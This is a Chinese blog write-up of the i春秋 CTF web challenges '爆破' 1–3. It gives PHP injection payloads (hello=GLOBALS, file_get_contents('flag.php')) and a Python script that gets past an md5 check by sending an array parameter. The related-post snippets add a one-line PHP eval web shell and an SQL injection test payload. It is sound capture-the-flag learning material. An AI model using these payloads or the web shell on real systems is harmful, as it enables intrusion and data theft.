i春秋CTF WEB-爆破

最新推荐文章于 2025-01-18 16:16:48 发布
最新推荐文章于 2025-01-18 16:16:48 发布
阅读量332 收藏 1
点赞数 1
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qingchenldl/article/details/84576307
本文介绍了一种利用文件包含漏洞的方法,通过精心构造请求来绕过限制并获取隐藏的flag信息。文中详细解释了如何利用PHP全局变量GLOBALS以及md5函数的一个特性,通过Python脚本实现了自动化获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

爆破1,2,3

看似是爆破,其实可以直接GLOBALS查看所有的全局变量,其实考的是文件包含,六位字符的爆破实在是耗费时间==、

  1. hello=GLOBALS

  2. hello=file_get_contents('flag.php')

  3. 只要第一次传进去的value与session中的相等,则网页会输出下一个value值,通过使用md5函数不能对数组进行处理的漏洞来绕过substr(md5($value),5,4)==0的判断,使nums得值大于10即可得到flag

    python脚本

    # coding:utf-8
import requests

url = "http://344cb89508694654883e6e22c6fca5d6bbacd6e5f0b44746.game.ichunqiu.com/?value[]=ea"

al = ['abcdefghijklmnopqrstuvwxyz']

s = requests.session()

r = s.get(url)

for i in range(20):
    url = "http://344cb89508694654883e6e22c6fca5d6bbacd6e5f0b44746.game.ichunqiu.com/?value[]=" + r.content[0:2]
    r = s.get(url)
    if 'flag{' in r.content:
     print r.content[0:50]
     break
    else:
     print r.content[0:2]
CTF — 压缩包密码爆破
Liu_Bruce的博客
08-06 1万+
​ 在CTF比赛中,密码爆破压缩包(如ZIP或RAR文件)是一个常见的任务。针对ZIP压缩包的密码爆破主要是使用工具ARCHPR完成的。
i春秋 CTF misc web爆破-3
一个潜心学习的小白
10-27 2138
题目提示:这个真的是爆破。 <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea'; ...
CTFshow web入门——爆破
小元砸的博客
01-24 5243
web 21 一.涉及工具: burp suit burp suit 使用教程 二.解题思路: 1.随便输一个密码和用户名抓包一下 2.base64解密一下发现账号密码的形式为 账号:密码,根据题目提示我们用自定义迭代器爆破,使用方法参考:Custom iterator的使用 注:下面爆破用的字典是题目所提供的 3.爆破出结果 web 22 一.涉及知识点: 子域名爆破(此题不能爆破出来)在线子域名爆破 二.解题思路: 直接点开View Hint(提示)即可得到答案 web 23 一.涉及工具: p
CTFshow-web入门爆破(21-28)
i_kei的博客
12-13 8218
web21 用burp抓包 输入的账户名和密码被base64加密了,用burp自带解密发现账户名和密码之间用冒号隔开了,接下来构造payload 分别选中账户名和密码,我这里选择把冒号放到了账户名那里,放到密码也可以,只是一会儿加前缀和后缀的区别 payload1(账户名):先导入题目提供的字典,然后加后缀冒号,再用base64加密 payload2(密码):导入提供的字典,base64加密 payload1和payload2都需要取消勾选 构造完之后,发现需要爆破的条目数太大了,经过群里大佬
CTF BurpSuite安装及Intruder爆破模块应用
qq_27489877的博客
07-25 2202
BurpSuite工具安装、版本选择、CA证书导入、Intruder爆破模块介绍、CTFshow web21-28题复现题解
i春秋CTF训练 Misc Web 爆破-1
椰奶冻不安全的博客
06-19 1206
Misc Web 爆破-1 题目内容:flag就在某六位变量中。 http://8007423c57e9409f94f941eac88ab2157ad7f90842f0497b.changame.ichunqiu.com:80 访问网页得到php代码 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);")
i春秋CTF训练 Web Upload
椰奶冻不安全的博客
06-21 1434
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1) 题目内容:想怎么传就怎么传,就是这么任性。 tips:flag在flag.php中 链接需到ichunqiu网站申请 访问网页得到文件上传输入框 明显是文件上传漏洞 方法一:上传木马 上传小马 <?pHp @eval($_POST['123']);?> 页面显示 @eval($_POST['123']);?> 把<?和php过滤了,可以用大小写绕过php的过
i春秋CTF训练 Web Login
椰奶冻不安全的博客
07-04 5864
Web Login 题目内容:加油,我看好你 本题由擂主Wfox提供 题目链接请在i春秋申请 访问发现是个登录页面,还以为是爆破弱口令,结果在页面源码里看到一行注释 <!-- test1 test1 --> 试了一下成功登录,然后重定向到了member.php页面,发现页面里啥也没有 只能用burpsuite抓包看看了,然后在response的headers里发现可疑参数show 然后在request的headers里添加一个show参数,值设置为1,发送,页面返回了php源码
i春秋CTF训练 Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块简单应用
椰奶冻不安全的博客
07-05 1124
Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块介绍 题目内容:12341234,然后就解开了 本题来自擂主C26 题目链接请在i春秋申请 login.php 源码里发现提示,用户名+出生年份就是密码,用zhangwei和zhangwei1999试了一下,没错当然登陆失败,只能再想办法了 常见的Web源码泄露漏洞 git源码泄露 Git是一个开源的分布式版本控制系统,每次执行初始化目录的时候会在当前目录下自动创建一个.git目录,用于记录代码的变更记录等 s
ctfshow】web入门-爆破(已完结)
最新发布
qq_55830703的博客
01-18 1377
ctfshow-爆破
ctfshow--web入门之爆破
2301_81133001的博客
10-24 2717
暴力破解实际就是疯狂的输入密码进行尝试登录,针对有的人喜欢用一些个人信息当做密码,有的人喜欢用一些很简单的低强度密码,我们就可以针对性的生成一个字典,用脚本或者工具挨个去尝试登录。
[CTF] CTFShow→WEB入门→爆破web 21~web 28】
ZXW_NUDT的博客
12-21 3318
web 21 这个时候还是老样子,用Burp Suite Community Edition抓包 先随便输一个用户名密码 比如 用户名:admin 密码:123456 抓到的包有个base64加密的,解密看一下格式 所以这个格式是:用户名:密码 这样就可以利用所给的密码字典跑密码了 具体操作看这里:[CTFHub]基础认证:Here is you flag:click(webweb前置技能>HTTP协议) web 22 略 web 23 <?php /* # -*- coding: ut
CTFshow-web爆破
weixin_44770698的博客
06-24 1267
CTFshow-web爆破wp
ctfshow--web--爆破
whisper921的博客
01-29 3700
web21 先输入账号admin,密码随便输入,bp抓包 输入的账户名和密码被base64加密了,用burp自带解密发现账户名和密码之间用冒号隔开了 接下来可以爆破了 载入题目字典 加前缀 再加一个编码 这个应该取消掉,因为里面有=,会造成编码失败 把flag格式输进去 开始爆破 得到flag web22 推荐使用这个网站 输入wp.ctf.show 没有发现 输入其他地址也没...
ctfshow web入门 爆破
wxh的博客
02-05 1946
web21 先随便输入一个账户密码 抓包
CTFshow刷题日记-WEB-爆破
Love&Share
09-03 3378
web21 提示:爆破什么的,都是基操 有一个zip文件,解压是一个爆破字典 Authorization: Basic dG9tY2F0OmFkbWlu ------->输入的用户名/口令以base64的形式传输。认证失败显示401 认证成功为200 将Authorization字段后面的值进行base64 解码,即可获取用户认证信息明文 使用bp的Intruder模块 payload type 选择custom iterator(自定义迭代器) 自定义迭代器可以自定义拼接方式,positio
CTF-show-爆破
qq_52696970的博客
04-06 4296
WEB入门-爆破1、web212、web223、web234、web245、web256、web267、web278、web28 1、web21 tomcat认证爆破–用户名:密码,一般使用custom iterator爆破 From:https://www.cnblogs.com/007NBqaq/p/13220297.html 得到爆破字典和需要输入账号密码的网页,于是先尝试输入账号admin密码1234进行抓包 抓包后没有看到admin或password的字段,但是看到一串base编码 解码结果为a
ctfshow爆破
遇事不决冲冲冲
08-19 3105
web21 登陆抓包 发现账号密码被加密,这里先解密 发现中间用一个冒号隔开了,发到Intruder模块进行爆破 利用题目所给的字典(重命名为.zip,再解压出来),在Payload1后添加:后缀,对Payload1、2进行base64加密 Payload set 1 Payload set 2 因为这样跑需要跑太多次了,这里已经知道账号就是admin了,直接对密码进行爆破。 发送到重放模块得到flag web22 web23 web24 web25 web26 web27 web28 ...
ctf-web刷题-ctfshow-爆破-web23
None安全团队
08-01 687
看一下代码 接收get参数token,然后把接收到的值进行md5加密,再判断第2位和第15位是否完全相等 并且 第十五位和第十八位也完全相等 完全前面的要求之后还要判断第二位 第十五位 第十八位取int值后进行相加是否等于第32位 这里的话给出的解题方案就是通过脚本 1-9 a-z组合生成md5 然后进行判断 是否符合条件 #coding: utf-8 #啊韬 import hashlib dic = '0123456789qazwsxedcrfvtgbyhnujmikolp' md5 =...
i春秋ctf web
01-04
### i春秋CTF Web安全挑战资源 #### 关于i春秋平台及其特色 i春秋是一个提供网络安全培训和竞赛的在线教育平台,该平台不仅提供了丰富的课程学习资料还举办了多次高水平的安全赛事。其中提到的百度杯CTF夺旗大战是由百度安全应急响应中心与i春秋共同发起的一项活动,这项比赛具有较长的时间跨度以及较高的频率特点[^1]。 #### Web安全挑战详情 对于希望参与Web方向CTF练习的人来说,在i春秋上可以找到许多优质的实践机会。通过访问[i春秋官网](http://www.ichunqiu.com),能够获取到有关往届比赛中涉及的具体题目解析及线下总决赛期间所使用的试题重现等内容,这对于提升个人技能水平十分有益处[^2]。 此外,除了官方提供的历年真题外,还可以关注一些第三方站点如[ADWorld XCTF社区](https://adworld.xctf.org.cn/),尽管有时会遇到服务器维护的情况,这里同样收录了不少高质量的WebCTF挑战项目供爱好者们交流探讨[^3]。 为了更好地准备这类基于Web的应用程序渗透测试环节,建议深入研究常见的漏洞类型(SQL注入、XSS跨站脚本攻击等),并尝试利用工具辅助分析目标系统的潜在弱点。同时也可以参考其他开源平台上分享的技术文档来补充理论知识,比如RPISEC团队整理的一系列二进制逆向工程教程就非常适合用来强化底层原理的理解[^4]。 ```python import requests def check_sql_injection(url, param): payload = "' OR '1'='1" test_url = f"{url}?{param}={payload}" response = requests.get(test_url) if "You have an error in your SQL syntax;" in response.text: print(f"[+] Potential SQL Injection found at {test_url}") else: print("[-] No obvious signs of SQL Injection") # Example usage (for educational purposes only!) check_sql_injection('http://example.com/login', 'username') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值